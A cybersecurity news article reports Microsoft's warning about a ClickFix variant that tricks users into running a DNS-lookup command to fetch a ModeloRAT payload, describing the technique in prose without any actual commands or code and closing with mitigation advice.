February 16, 2026

Microsoft Warns of ClickFix Attack Exploiting DNS Lookups for Malicious Purposes

Vaibhav February 16, 2026
Microsoft-Warns-of-ClickFix-Attack-Exploiting-DNS-Lookups-for-Malicious-Purposesdata
Post Views: 21

New Variant of ClickFix Attack Technique Identified

A new variant of the ClickFix attack technique has been identified, which leverages DNS lookups to deliver malware. This tactic involves displaying a fake error message on a compromised or malicious website, instructing the target to perform specific actions to address the issue. Unbeknownst to the user, these actions grant elevated permissions to the attacker.

Attack Technique

In a recent instance of this attack, the target was instructed to run a command that executed a custom DNS lookup against a hard-coded external DNS server. The output was then filtered to extract the ‘Name:’ DNS response, which was executed as the second-stage payload. This approach enables the attacker to reach their infrastructure and validate the execution of the second-stage payload, making it more difficult to detect by blending malicious traffic with regular network traffic.

Second-Stage Payload

The second-stage payload is a remote access trojan known as ModeloRAT, which allows attackers to collect information about the compromised system and execute additional payloads. While the origin of these attacks is unclear, a threat actor tracked as KongTuke has been linked to a similar campaign, dubbed CrashFix, which targeted corporate environments.

Effectiveness and Mitigation

The ClickFix technique has been increasingly used by both cybercriminals and state-sponsored actors over the past year. Its effectiveness lies in its ability to evade detection by exploiting the trust users have in their systems and the instructions provided by the attackers. As a result, it is essential for users to exercise caution when encountering error messages or instructions that seem suspicious or unusual.

The use of DNS lookups in this variant of the ClickFix attack highlights the importance of monitoring network traffic and DNS queries for suspicious activity. Organizations should also educate their users about the risks associated with following instructions from unknown sources and the importance of verifying the authenticity of error messages and system instructions.

According to the report, “The ClickFix technique has been increasingly used by both cybercriminals and state-sponsored actors over the past year.”



About Author

Vaibhav

See author's posts

More Stories

Luxury-Brands-Dior-Louis-Vuitton-Tiffany-Fined-25-Million-in-South-Korea-Data-Breachdata

Luxury Brands Dior, Louis Vuitton, Tiffany Fined $25 Million in South Korea Data Breach

Vaibhav February 16, 2026
Data-Breach-at-DavaIndia-Exposes-Customer-Orders-and-Admin-Controls-Across-883-Storesdata

Data Breach at DavaIndia Exposes Customer Orders and Admin Controls Across 883 Stores

Vaibhav February 16, 2026
Enhance-Enterprise-Security-with-Centralized-User-Vault-Restrictions-in-Passwork-7-4data

Enhance Enterprise Security with Centralized User Vault Restrictions in Passwork 7.4

Vaibhav February 16, 2026

You may have missed

Indian-Ambassador-Meets-Cambodian-Police-to-Combat-Online-Scams-and-Cybercrimesdata

Indian Ambassador Meets Cambodian Police to Combat Online Scams and Cybercrimes

Vaibhav February 16, 2026
Maintaining-ISO-27001-Compliance-in-a-Passwordless-World-The-Shift-to-Passkeysdata

Maintaining ISO 27001 Compliance in a Passwordless World: The Shift to Passkeys

Vaibhav February 16, 2026
Luxury-Brands-Dior-Louis-Vuitton-Tiffany-Fined-25-Million-in-South-Korea-Data-Breachdata

Luxury Brands Dior, Louis Vuitton, Tiffany Fined $25 Million in South Korea Data Breach

Vaibhav February 16, 2026
Data-Breach-at-DavaIndia-Exposes-Customer-Orders-and-Admin-Controls-Across-883-Storesdata

Data Breach at DavaIndia Exposes Customer Orders and Admin Controls Across 883 Stores

Vaibhav February 16, 2026
ED-Seizes-12-229-Crore-Cybercrime-Proceeds-Reach-34-855-Crore-Under-PMLAdata

ED Seizes ₹12,229 Crore, Cybercrime Proceeds Reach ₹34,855 Crore Under PMLA

Vaibhav February 16, 2026
en_USEnglish
en_USEnglish